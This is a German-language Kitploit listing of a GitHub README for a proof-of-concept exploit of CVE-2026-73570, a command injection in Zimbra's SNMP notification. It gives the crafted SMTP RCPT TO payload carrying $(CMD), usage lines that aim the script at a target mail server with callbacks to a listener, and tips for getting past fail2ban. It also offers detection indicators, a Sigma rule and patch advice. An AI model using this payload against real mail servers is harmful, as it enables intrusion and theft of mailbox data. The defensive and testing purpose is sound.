Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-73570 — Proof-of-Concept-Exploit für CVE-2026-73570, eine nicht authentifizierte OS-Befehlsinjektion in der Zimbra Collaboration Suite über zimbra-snmp-Log-Injektion, mit Hinweisen zur Erkennung. | Kitploit
Tools/GitHubGitHub/hainhc/cve-2026-73570
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsIncident ResponseE-Mail-Sicherheit
GitHubhainhc/cve-2026-73570

CVE-2026-73570

Proof-of-Concept-Exploit für CVE-2026-73570, eine nicht authentifizierte OS-Befehlsinjektion in der Zimbra Collaboration Suite über zimbra-snmp-Log-Injektion, mit Hinweisen zur Erkennung.

Repository anzeigen
vor 1 TagNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-73570 — Zimbra zimbra-snmp Unauthentifizierte OS-Befehlsinjektion PoC

Proof-of-Concept-Exploit für CVE-2026-73570, eine unauthentifizierte OS-Befehls- injektion (CWE-78, CVSS 8.9) in Zimbra Collaboration Suite < 10.1.20, wenn das Paket zimbra-snmp installiert und SNMP-Benachrichtigungen aktiviert sind.

Haftungsausschluss: Dieser PoC ist ausschließlich für autorisierte Sicherheitstests, Defensivforschung und die Validierung Ihrer eigenen Systeme gedacht. Verwenden Sie ihn nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben.

Schwachstellenmechanismus

Zimbas SNMP-Benachrichtigungsfunktion verwendet swatchdog, um /var/log/zimbra.log auf Service-Ereignisse zu überwachen. Wenn eine Logzeile dem Watch-Muster entspricht, wird der übereinstimmende Text in einen Shell-Befehl interpoliert, der die SNMP-Benachrichtigung sendet — ohne Bereinigung.

Die Angriffskette:

root@kitploit:~
1. Angreifer sendet eine SMTP-Sitzung mit einer manipulierten RCPT-TO-Adresse:

   RCPT TO:<"x: Service status change: localhost $(CMD)
            changed from stopped to running"@cve.invalid>

   Der lokale Teil ist ein RFC-5321-Quoted-String, sodass Postfix die
   Adresssyntax akzeptiert (Leerzeichen, Doppelpunkte, $(...) inklusive).

2. Postfix weist den Empfänger zurück (Relay verweigert / Benutzer unbekannt / Sender-
   Einschränkung) und schreibt den VOLLSTÄNDIGEN to=<...>-String, Anführungszeichen entfernt, in
   /var/log/zimbra.log:

   NOQUEUE: reject: RCPT from unknown[x.x.x.x]: ... to=<x: Service status
   change: localhost $(CMD) changed from stopped to [email protected]> ...

3. swatchdog (zimbra-snmp) durchsucht das Log regelmäßig und gleicht es mit seinem
   watchfor-Muster "Service status change ... changed from ... to ..." ab.

4. Der übereinstimmende Text wird in den SNMP-Benachrichtigungs-Shell-Befehl interpoliert
   -> $(CMD) wird ausgewertet -> Befehlsausführung als Benutzer `zimbra`.

Voraussetzungen

Das Ziel muss alle der folgenden Bedingungen erfüllen:

  • Zimbra Collaboration < 10.1.20
  • zimbra-snmp-Paket installiert
  • SNMP-Benachrichtigungen aktiviert (zmlocalconfig | grep -i snmp_notify)

Angreiferseite: Python 3 (nur Standardbibliothek, keine Abhängigkeiten).

Verwendung

root@kitploit:~
# 1. RCE über Out-of-Band-DNS-Callback verifizieren (interactsh / Burp Collaborator):
python3 poc_cve_2026_73570.py -t mail.target.com --oob abc123.oast.site

# 2. RCE über HTTP-Callback an Ihren Listener verifizieren:
python3 poc_cve_2026_73570.py -t mail.target.com --oob http://10.0.0.5:8884/cb

# 3. Eine Marker-Datei auf dem Host ablegen (danach manuell auf dem Server prüfen):
python3 poc_cve_2026_73570.py -t mail.target.com --cmd "touch /tmp/CVE-2026-73570_pwned"

# 4. Nur Fingerprinting (keine Payload gesendet):
python3 poc_cve_2026_73570.py -t mail.target.com --check-only

# Debug: das vollständige SMTP-Transkript ausgeben
python3 poc_cve_2026_73570.py -t mail.target.com --cmd "id" --debug

Optionen:

FlagBeschreibung
-t, --targetZiel-Zimbra-SMTP-IP/Hostname (erforderlich)
-p, --portSMTP-Port (Standard: 25)
--tlsSTARTTLS verwenden (z. B. Port 587)
--oobOOB-DNS-Domain oder HTTP-Callback-URL (empfohlen)
--cmdBeliebiger Befehl anstelle des OOB-Callbacks
--fake-hostHostname innerhalb des gefälschten Service status change-Strings (Standard: localhost)
--check-onlyNur Fingerprinting, keine Payloads senden
--delayVerzögerung zwischen den Sendevorgängen in Sekunden (Standard: 1.0)
--debugVollständiges SMTP-Transkript ausgeben

Verifizierung

Das Skript sendet jeden Befehl in mehreren Injektionsvarianten ($(...), Backticks, ;cmd;#, $({IFS}...)). Beobachten Sie für jede Variante den RCPT- Antwortcode:

RCPT-AntwortBedeutung
250, 450, 454 Relay access denied, 550 5.1.1 User unknownAdresssyntax akzeptiert — die Reject-Zeile mit dem vollständigen to=<...>-String steht nun im Log. Payload platziert.
501 5.1.3 Bad recipient address syntaxPostfix hat die Adresse bereits beim Parsen zurückgewiesen — nichts Nützliches geloggt. Das Skript versucht automatisch einen unquoted Fallback.

Bestätigen Sie dann auf dem Server (falls Sie Zugriff haben):

root@kitploit:~
# Die injizierte Zeile muss vorhanden sein:
grep 'Service status change' /var/log/zimbra.log | tail
# Erwartet: ... to=<x: Service status change: localhost $(...) changed from stopped to [email protected]> ...

# 1-5 Minuten warten (swatchdog durchsucht das Log regelmäßig — die Ausführung erfolgt NICHT in Echtzeit),
# dann nach dem Effekt suchen:
ls -la /tmp/                    # falls Sie --cmd verwendet haben
# oder Ihren OOB-Listener auf den Callback überwachen

Wenn die Logzeile vorhanden ist, der Befehl aber nie ausgeführt wird, liegen die verbleibenden Voraussetzungen auf der swatchdog-Seite: Prüfen Sie, ob der Prozess läuft (ps aux | grep swatch) und ob seine Konfiguration tatsächlich auf das Service status change-Muster achtet.

Ausführungskontext: Befehle werden als Benutzer zimbra ausgeführt (nicht als root).

Fehlerbehebung

  • Überhaupt keine Logzeilen: Ihre Quell-IP ist wahrscheinlich blockiert (fail2ban nach wiederholten fehlerhaften Versuchen oder eine Firewall). Prüfen Sie fail2ban-client status, iptables -L -n | grep <your_ip> und bestätigen Sie, dass Pakete Postfix erreichen, mit tcpdump -i any port 25 and host <your_ip> -nn -A.
  • Zu eng gegrept: Fehlerhafte Adressen werden als warning: Illegal address syntax ... in RCPT command: ... statt als NOQUEUE: reject-Zeile geloggt. Grepen Sie stattdessen nach Ihrer Angreifer-IP.
  • Ausführungsverzögerung: swatchdog pollt das Log zyklisch — warten Sie 1–5 Minuten ab, bevor Sie auf einen Fehlschlag schließen.

Erkennung (für Verteidiger)

Wichtige Indikatoren für eine erfolgreiche Ausnutzung:

  1. Log-Artefakt (Versuch): to=<*: Service status change: *$(...)* innerhalb einer Postfix-Reject-Zeile in /var/log/zimbra.log — praktisch null False Positives, da der Text Service status change niemals legitim innerhalb einer to=<>-Adresse erscheint.
  2. Prozessbaum (hohe Genauigkeit): jede Shell oder jeder Befehlsinterpreter (sh, bash, curl, wget, nc, python, perl), der als Kindprozess von swatchdog / swatch gestartet wird.
  3. Post-Exploitation: neue .jsp/.jspx-Dateien unter /opt/zimbra/jetty/webapps/ oder /opt/zimbra/jetty_base/webapps/, unerwartete Dateien in /tmp/, neue Cron-Einträge oder SSH-Schlüssel für den Benutzer zimbra und ausgehende Verbindungen vom Mailserver, die nicht dem normalen Mailfluss entsprechen.

Beispiel-Sigma-Regel (Versuchsphase):

root@kitploit:~
title: Zimbra SNMP Notification Log Injection Attempt - CVE-2026-73570
logsource:
  product: linux
  service: postfix
detection:
  sel:
    - 'to=<*: Service status change: *$(*'
    - 'to=<*: Service status change: *`*'
  condition: sel
level: high
tags:
  - attack.initial-access
  - attack.t1190
  - cve.2026.73570

Behebung

  • Aktualisieren Sie Zimbra Collaboration auf 10.1.20 oder höher.
  • Falls ein sofortiges Upgrade nicht möglich ist: Deaktivieren Sie SNMP-Benachrichtigungen und erwägen Sie, das Paket zimbra-snmp bis zum Patch zu stoppen/entfernen.
  • Diese CVE ist in der CISA KEV mit bestätigter aktiver Ausnutzung gelistet — durchsuchen Sie rückwirkend mindestens 30 Tage Logs auf jedem zuvor anfälligen System und behandeln Sie jede bestätigte Kompromittierung als vollständige Offenlegung der Mailbox-Daten.

Referenzen

  • Zimbra Security Advisories (Hersteller): https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
  • Zimbra 10.1.20 Patch-Release (Fix): https://blog.zimbra.com/2026/07/patch-release-update-zimbra-10-1-20/
  • NVD — CVE-2026-73570: https://nvd.nist.gov/vuln/detail/CVE-2026-73570
  • CISA Known Exploited Vulnerabilities Catalog (hinzugefügt am 2026-08-21): https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search=CVE-2026-73570
  • CISA-Warnung — "CISA Adds One Known Exploited Vulnerability to Catalog": https://www.cisa.gov/news-events/alerts/2026/08/21/cisa-adds-one-known-exploited-vulnerability-catalog
  • CERT Polska Advisory 145/2026 (aktive Ausnutzung + IoC-Hinweise, 2026-08-17): https://moje.cert.pl/komunikaty/2026/145/aktywnie-wykorzystywana-podatnosc-w-zimbra-collaboration-suite/
  • BleepingComputer — "Critical Zimbra RCE flaw now actively exploited in attacks": https://www.bleepingcomputer.com/news/security/critical-zimbra-rce-flaw-now-actively-exploited-in-attacks/
  • Help Net Security — "Unpatched Zimbra servers are falling to CVE-2026-73570 attacks": https://www.helpnetsecurity.com/2026/08/25/zimbra-cve-2026-73570-compromised/
Tool herunterladen